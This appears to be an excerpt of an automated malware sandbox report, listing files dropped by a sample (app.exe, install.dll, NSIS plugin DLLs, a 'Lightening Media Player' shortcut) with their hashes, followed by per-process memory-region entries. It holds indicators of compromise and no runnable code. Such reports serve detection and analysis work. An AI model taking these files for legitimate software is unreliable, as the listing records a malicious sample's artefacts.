                                                                                                            051cb06b4a8daecfd4e91ccc92e9665e

                                                                                                            SHA1

                                                                                                            b3f7c3a823a3f0cc6aa0b1a02321260b77e66a49

                                                                                                            SHA256

                                                                                                            17b6041b45ba05ad85645490fe580609cd556fbd3b1f00d8ef21aaa9b9e5e577

                                                                                                            SHA512

                                                                                                            c8ac9c5cf75483c0d3a2ebc00a5567bdbf70233730f0368df9befa26d4b394338abd37e85c0800e60f451e9c85a8550c82119cba4b55c0c0bf474d3d621416ac

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\zxc2ch03.sxw\app.exe
                                                                                                            MD5

                                                                                                            051cb06b4a8daecfd4e91ccc92e9665e

                                                                                                            SHA1

                                                                                                            b3f7c3a823a3f0cc6aa0b1a02321260b77e66a49

                                                                                                            SHA256

                                                                                                            17b6041b45ba05ad85645490fe580609cd556fbd3b1f00d8ef21aaa9b9e5e577

                                                                                                            SHA512

                                                                                                            c8ac9c5cf75483c0d3a2ebc00a5567bdbf70233730f0368df9befa26d4b394338abd37e85c0800e60f451e9c85a8550c82119cba4b55c0c0bf474d3d621416ac

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\zxc2ch03.sxw\app.exe
                                                                                                            MD5

                                                                                                            051cb06b4a8daecfd4e91ccc92e9665e

                                                                                                            SHA1

                                                                                                            b3f7c3a823a3f0cc6aa0b1a02321260b77e66a49

                                                                                                            SHA256

                                                                                                            17b6041b45ba05ad85645490fe580609cd556fbd3b1f00d8ef21aaa9b9e5e577

                                                                                                            SHA512

                                                                                                            c8ac9c5cf75483c0d3a2ebc00a5567bdbf70233730f0368df9befa26d4b394338abd37e85c0800e60f451e9c85a8550c82119cba4b55c0c0bf474d3d621416ac

                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lightening Media Player.lnk
                                                                                                            MD5

                                                                                                            1ffc3f7384d85e1b554b60b75cf9573e

                                                                                                            SHA1

                                                                                                            2bf44021f74b131174bd5645dba0adc0fff2072d

                                                                                                            SHA256

                                                                                                            a405ebaa9ba0ca575bdef8240e706a50eacd4c77e70ce4985e27d5ac95c35cfe

                                                                                                            SHA512

                                                                                                            ad73ecfd11d26fef09f676b2076fa1c0b05b45e9d6d1455fd4deca60ed40d03fb57a92bedd644c2e7aff4c604d91fa960a7cea0434b051265b4eb12bf3e1bdda

                                                                                                          • C:\Users\Admin\Desktop\Lightening Media Player.lnk
                                                                                                            MD5

                                                                                                            87c64619b3f302ad186a2d4c7a938c15

                                                                                                            SHA1

                                                                                                            02c5d5b8ed590cdeb427cb9a138f12bbbcb75fd5

                                                                                                            SHA256

                                                                                                            aa308e901be0cfd85fac6eb06a4722301a93ba2671e5ddacb214cff67f632981

                                                                                                            SHA512

                                                                                                            7524266583aa9690bf57f0fc4757903d7963ca93284810f9d30ea7bf1fc3da0c1fabeee2ed713b4efed2f25cea9d81d7ba64aa10fc51b75e2eed196c328abc5e

                                                                                                          • \Program Files\install.dll
                                                                                                            MD5

                                                                                                            fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                            SHA1

                                                                                                            6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                            SHA256

                                                                                                            9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                            SHA512

                                                                                                            0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                          • \Users\Admin\AppData\LocalLow\sqlite3.dll
                                                                                                            MD5

                                                                                                            f964811b68f9f1487c2b41e1aef576ce

                                                                                                            SHA1

                                                                                                            b423959793f14b1416bc3b7051bed58a1034025f

                                                                                                            SHA256

                                                                                                            83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

                                                                                                            SHA512

                                                                                                            565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

                                                                                                          • \Users\Admin\AppData\Local\Temp\AE30.tmp
                                                                                                            MD5

                                                                                                            50741b3f2d7debf5d2bed63d88404029

                                                                                                            SHA1

                                                                                                            56210388a627b926162b36967045be06ffb1aad3

                                                                                                            SHA256

                                                                                                            f2f8732ae464738372ff274b7e481366cecdd2337210d4a3cbcd089c958a730c

                                                                                                            SHA512

                                                                                                            fac6bfe35b1ee08b3d42d330516a260d9cdb4a90bbb0491411a583029b92a59d20af3552372ea8fb3f59442b3945bf524ef284127f397ae7179467080be8e9b3

                                                                                                          • \Users\Admin\AppData\Local\Temp\CC4F.tmp
                                                                                                            MD5

                                                                                                            50741b3f2d7debf5d2bed63d88404029

                                                                                                            SHA1

                                                                                                            56210388a627b926162b36967045be06ffb1aad3

                                                                                                            SHA256

                                                                                                            f2f8732ae464738372ff274b7e481366cecdd2337210d4a3cbcd089c958a730c

                                                                                                            SHA512

                                                                                                            fac6bfe35b1ee08b3d42d330516a260d9cdb4a90bbb0491411a583029b92a59d20af3552372ea8fb3f59442b3945bf524ef284127f397ae7179467080be8e9b3

                                                                                                          • \Users\Admin\AppData\Local\Temp\is-A0E5E.tmp\idp.dll
                                                                                                            MD5

                                                                                                            8f995688085bced38ba7795f60a5e1d3

                                                                                                            SHA1

                                                                                                            5b1ad67a149c05c50d6e388527af5c8a0af4343a

                                                                                                            SHA256

                                                                                                            203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006

                                                                                                            SHA512

                                                                                                            043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

                                                                                                          • \Users\Admin\AppData\Local\Temp\nsy82C4.tmp\Dialer.dll
                                                                                                            MD5

                                                                                                            7eb8a5c6ee1e134473eef694b05cfab7

                                                                                                            SHA1

                                                                                                            8bf3eb9030d369739147dfede07e913bda041584

                                                                                                            SHA256

                                                                                                            78199ba6a820f2f7d0429c636ac9a7bcc58ef9ced468549c7608c684e0dc99a4

                                                                                                            SHA512

                                                                                                            152fd07baf404e035f086d865225b50d5c845346cecbf1f89c1b38cf03b93cd9377b6513545a4936caec496a09bc855fcc8e74f36524fe7d9a719fd715a3b562

                                                                                                          • \Users\Admin\AppData\Local\Temp\nsy82C4.tmp\System.dll
                                                                                                            MD5

                                                                                                            2e025e2cee2953cce0160c3cd2e1a64e

                                                                                                            SHA1

                                                                                                            dec3da040ea72d63528240598bf14f344efb2a76

                                                                                                            SHA256

                                                                                                            d821a62802900b068dcf61ddc9fdff2f7ada04b706815ab6e5038b21543da8a5

                                                                                                            SHA512

                                                                                                            3cafce382b605a68e5a3f35f95b32761685112c5a9da9f87b0a06ec13da4155145bd06ffb63131bf87c3dc8bd61cb085884c5e78c832386d70397e3974854860

                                                                                                          • \Users\Admin\AppData\Local\Temp\nsy82C4.tmp\nsExec.dll
                                                                                                            MD5

                                                                                                            1139fb5cc942e668c8277f8b8f1e5f20

                                                                                                            SHA1

                                                                                                            94bbb2454dad420b70553c0fca4899f120d3ed43

                                                                                                            SHA256

                                                                                                            9cb71f00c19397723d39861ff809c70f9d2cdbcf91b3dd8021060714512a39cb

                                                                                                            SHA512

                                                                                                            08e8eb820801875208d9f28fb1416e0fc66abf5cc343e7ac973cc6736dbcd0f85b1bf42e8d110ad8c9a9ced204c00cf530099b8c411871762615051e1f7061d0

                                                                                                          • \Users\Admin\AppData\Local\Temp\nsy82C4.tmp\nsExec.dll
                                                                                                            MD5

                                                                                                            1139fb5cc942e668c8277f8b8f1e5f20

                                                                                                            SHA1

                                                                                                            94bbb2454dad420b70553c0fca4899f120d3ed43

                                                                                                            SHA256

                                                                                                            9cb71f00c19397723d39861ff809c70f9d2cdbcf91b3dd8021060714512a39cb

                                                                                                            SHA512

                                                                                                            08e8eb820801875208d9f28fb1416e0fc66abf5cc343e7ac973cc6736dbcd0f85b1bf42e8d110ad8c9a9ced204c00cf530099b8c411871762615051e1f7061d0

                                                                                                          • \Users\Admin\AppData\Local\Temp\nsy82C4.tmp\nsExec.dll
                                                                                                            MD5

                                                                                                            1139fb5cc942e668c8277f8b8f1e5f20

                                                                                                            SHA1

                                                                                                            94bbb2454dad420b70553c0fca4899f120d3ed43

                                                                                                            SHA256

                                                                                                            9cb71f00c19397723d39861ff809c70f9d2cdbcf91b3dd8021060714512a39cb

                                                                                                            SHA512

                                                                                                            08e8eb820801875208d9f28fb1416e0fc66abf5cc343e7ac973cc6736dbcd0f85b1bf42e8d110ad8c9a9ced204c00cf530099b8c411871762615051e1f7061d0

                                                                                                          • \Users\Admin\AppData\Local\Temp\nsy82C4.tmp\nsExec.dll
                                                                                                            MD5

                                                                                                            1139fb5cc942e668c8277f8b8f1e5f20

                                                                                                            SHA1

                                                                                                            94bbb2454dad420b70553c0fca4899f120d3ed43

                                                                                                            SHA256

                                                                                                            9cb71f00c19397723d39861ff809c70f9d2cdbcf91b3dd8021060714512a39cb

                                                                                                            SHA512

                                                                                                            08e8eb820801875208d9f28fb1416e0fc66abf5cc343e7ac973cc6736dbcd0f85b1bf42e8d110ad8c9a9ced204c00cf530099b8c411871762615051e1f7061d0

                                                                                                          • \Users\Admin\AppData\Local\Temp\nsy82C4.tmp\nsExec.dll
                                                                                                            MD5

                                                                                                            1139fb5cc942e668c8277f8b8f1e5f20

                                                                                                            SHA1

                                                                                                            94bbb2454dad420b70553c0fca4899f120d3ed43

                                                                                                            SHA256

                                                                                                            9cb71f00c19397723d39861ff809c70f9d2cdbcf91b3dd8021060714512a39cb

                                                                                                            SHA512

                                                                                                            08e8eb820801875208d9f28fb1416e0fc66abf5cc343e7ac973cc6736dbcd0f85b1bf42e8d110ad8c9a9ced204c00cf530099b8c411871762615051e1f7061d0

                                                                                                          • memory/356-208-0x0000024161460000-0x00000241614D0000-memory.dmp
                                                                                                            Filesize

                                                                                                            448KB

                                                                                                          • memory/504-352-0x0000000000000000-mapping.dmp
                                                                                                          • memory/512-217-0x00000180604A0000-0x0000018060510000-memory.dmp
                                                                                                            Filesize

                                                                                                            448KB

                                                                                                          • memory/512-185-0x000001805FDC0000-0x000001805FDC2000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/1020-360-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1128-215-0x0000024F009E0000-0x0000024F00A50000-memory.dmp
                                                                                                            Filesize

                                                                                                            448KB

                                                                                                          • memory/1180-223-0x0000027FA3960000-0x0000027FA39D0000-memory.dmp
                                                                                                            Filesize

                                                                                                            448KB

                                                                                                          • memory/1340-225-0x000002346AFD0000-0x000002346B040000-memory.dmp
                                                                                                            Filesize

                                                                                                            448KB

                                                                                                          • memory/1448-219-0x0000020A26150000-0x0000020A261C0000-memory.dmp
                                                                                                            Filesize

                                                                                                            448KB

                                                                                                          • memory/1528-356-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1544-350-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1868-252-0x000001CABE200000-0x000001CABE2FF000-memory.dmp
                                                                                                            Filesize

                                                                                                            1020KB

                                                                                                          • memory/1868-207-0x000001CABBC00000-0x000001CABBC70000-memory.dmp
                                                                                                            Filesize

                                                                                                            448KB

                                                                                                          • memory/1868-171-0x00007FF6BDF54060-mapping.dmp
                                                                                                          • memory/1924-221-0x00000208F0A60000-0x00000208F0AD0000-memory.dmp
                                                                                                            Filesize

                                                                                                            448KB

                                                                                                          • memory/2028-354-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2068-368-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2120-153-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2204-235-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2244-262-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2264-362-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2380-213-0x0000023CDD340000-0x0000023CDD3B0000-memory.dmp
                                                                                                            Filesize

                                                                                                            448KB

                                                                                                          • memory/2400-210-0x0000021C9DCA0000-0x0000021C9DD10000-memory.dmp
                                                                                                            Filesize

                                                                                                            448KB

                                                                                                          • memory/2416-318-0x00000000034B0000-0x00000000034C5000-memory.dmp
                                                                                                            Filesize

                                                                                                            84KB

                                                                                                          • memory/2416-303-0x0000000001480000-0x0000000001497000-memory.dmp
                                                                                                            Filesize

                                                                                                            92KB

                                                                                                          • memory/2608-205-0x00000214421D0000-0x0000021442240000-memory.dmp
                                                                                                            Filesize

                                                                                                            448KB

                                                                                                          • memory/2708-227-0x0000023397E60000-0x0000023397ED0000-memory.dmp
                                                                                                            Filesize

                                                                                                            448KB

                                                                                                          • memory/2720-198-0x000001B4523A0000-0x000001B4523EB000-memory.dmp
                                                                                                            Filesize

                                                                                                            300KB

                                                                                                          • memory/2720-201-0x000001B452570000-0x000001B4525E0000-memory.dmp
                                                                                                            Filesize

                                                                                                            448KB

                                                                                                          • memory/2936-363-0x0000000000000000-mapping.dmp
                                                                                                          • memory/3076-369-0x0000000000000000-mapping.dmp
                                                                                                          • memory/3212-120-0x0000000000000000-mapping.dmp
                                                                                                          • memory/3212-123-0x00000000028F0000-0x00000000028F2000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/3232-211-0x0000000000000000-mapping.dmp
                                                                                                          • memory/3236-348-0x0000000000000000-mapping.dmp
                                                                                                          • memory/3248-232-0x0000000000000000-mapping.dmp
                                                                                                          • memory/3248-266-0x0000000000000000-mapping.dmp
                                                                                                          • memory/3248-300-0x0000000000400000-0x0000000000D25000-memory.dmp
                                                                                                            Filesize

                                                                                                            9.1MB

                                                                                                          • memory/3248-299-0x0000000002E10000-0x000000000371B000-memory.dmp
                                                                                                            Filesize

                                                                                                            9.0MB

                                                                                                          • memory/3440-228-0x0000000000000000-mapping.dmp
                                                                                                          • memory/3440-310-0x0000000003CB0000-0x0000000003CC0000-memory.dmp
                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/3440-304-0x0000000003AB0000-0x0000000003AC0000-memory.dmp
                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/3480-154-0x0000000000000000-mapping.dmp
                                                                                                          • memory/3480-158-0x00000000004F0000-0x000000000063A000-memory.dmp
                                                                                                            Filesize

                                                                                                            1.3MB

                                                                                                          • memory/3480-157-0x0000000000430000-0x00000000004DE000-memory.dmp
                                                                                                            Filesize

                                                                                                            696KB

                                                                                                          • memory/3788-358-0x0000000000000000-mapping.dmp
                                                                                                          • memory/3872-124-0x0000000000000000-mapping.dmp
                                                                                                          • memory/3872-126-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                            Filesize

                                                                                                            88KB

                                                                                                          • memory/4004-137-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4004-147-0x0000000002FB2000-0x0000000002FB4000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4004-145-0x0000000002FB0000-0x0000000002FB2000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4004-152-0x0000000002FB5000-0x0000000002FB6000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4016-129-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4016-135-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4056-146-0x0000000000A50000-0x0000000000A52000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4056-142-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4056-149-0x0000000000A54000-0x0000000000A55000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4056-151-0x0000000000A55000-0x0000000000A57000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4056-148-0x0000000000A52000-0x0000000000A54000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4076-161-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4116-131-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4116-136-0x0000000000F50000-0x0000000000F52000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4156-168-0x0000000002BBB000-0x0000000002CBC000-memory.dmp
                                                                                                            Filesize

                                                                                                            1.0MB

                                                                                                          • memory/4156-196-0x0000000004480000-0x00000000044DC000-memory.dmp
                                                                                                            Filesize

                                                                                                            368KB

                                                                                                          • memory/4156-164-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4208-347-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4260-280-0x0000000007550000-0x0000000007551000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4260-265-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4260-274-0x0000000006700000-0x0000000006701000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4260-290-0x0000000007F20000-0x0000000007F21000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4260-289-0x00000000080F0000-0x00000000080F1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4260-288-0x00000000074E0000-0x00000000074E1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4260-326-0x0000000006873000-0x0000000006874000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4260-277-0x0000000006872000-0x0000000006873000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4260-275-0x0000000006EB0000-0x0000000006EB1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4260-281-0x00000000077A0000-0x00000000077A1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4260-279-0x0000000007730000-0x0000000007731000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4260-276-0x0000000006870000-0x0000000006871000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4260-278-0x0000000006E20000-0x0000000006E21000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4364-346-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4436-114-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                            Filesize

                                                                                                            172KB

                                                                                                          • memory/4536-202-0x0000029358EE0000-0x0000029358F50000-memory.dmp
                                                                                                            Filesize

                                                                                                            448KB

                                                                                                          • memory/4620-359-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4624-364-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4692-367-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4696-351-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4824-160-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4880-119-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4880-115-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5032-231-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5148-242-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5232-333-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5240-236-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5260-365-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5328-243-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5344-246-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5344-254-0x0000000000430000-0x000000000057A000-memory.dmp
                                                                                                            Filesize

                                                                                                            1.3MB

                                                                                                          • memory/5344-253-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/5352-237-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5376-271-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5376-298-0x0000000000400000-0x00000000004A0000-memory.dmp
                                                                                                            Filesize

                                                                                                            640KB

                                                                                                          • memory/5376-297-0x00000000004F0000-0x00000000004F9000-memory.dmp
                                                                                                            Filesize

                                                                                                            36KB

                                                                                                          • memory/5436-343-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5504-255-0x00000000048C0000-0x0000000004951000-memory.dmp
                                                                                                            Filesize

                                                                                                            580KB

                                                                                                          • memory/5504-256-0x0000000000400000-0x0000000002BF4000-memory.dmp
                                                                                                            Filesize

                                                                                                            40.0MB

                                                                                                          • memory/5504-238-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5560-357-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5576-251-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5708-353-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5716-283-0x0000000000402F68-mapping.dmp
                                                                                                          • memory/5716-282-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                            Filesize

                                                                                                            48KB

                                                                                                          • memory/5772-323-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5772-334-0x0000000004EE3000-0x0000000004EE4000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/5772-329-0x0000000004EE2000-0x0000000004EE3000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/5772-328-0x0000000004EE0000-0x0000000004EE1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/5796-345-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5856-258-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5896-349-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5920-324-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5944-366-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6012-338-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6048-286-0x00000000006E0000-0x00000000006EC000-memory.dmp
                                                                                                            Filesize

                                                                                                            48KB

                                                                                                          • memory/6048-259-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6096-263-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6100-355-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6108-241-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6132-361-0x0000000000000000-mapping.dmp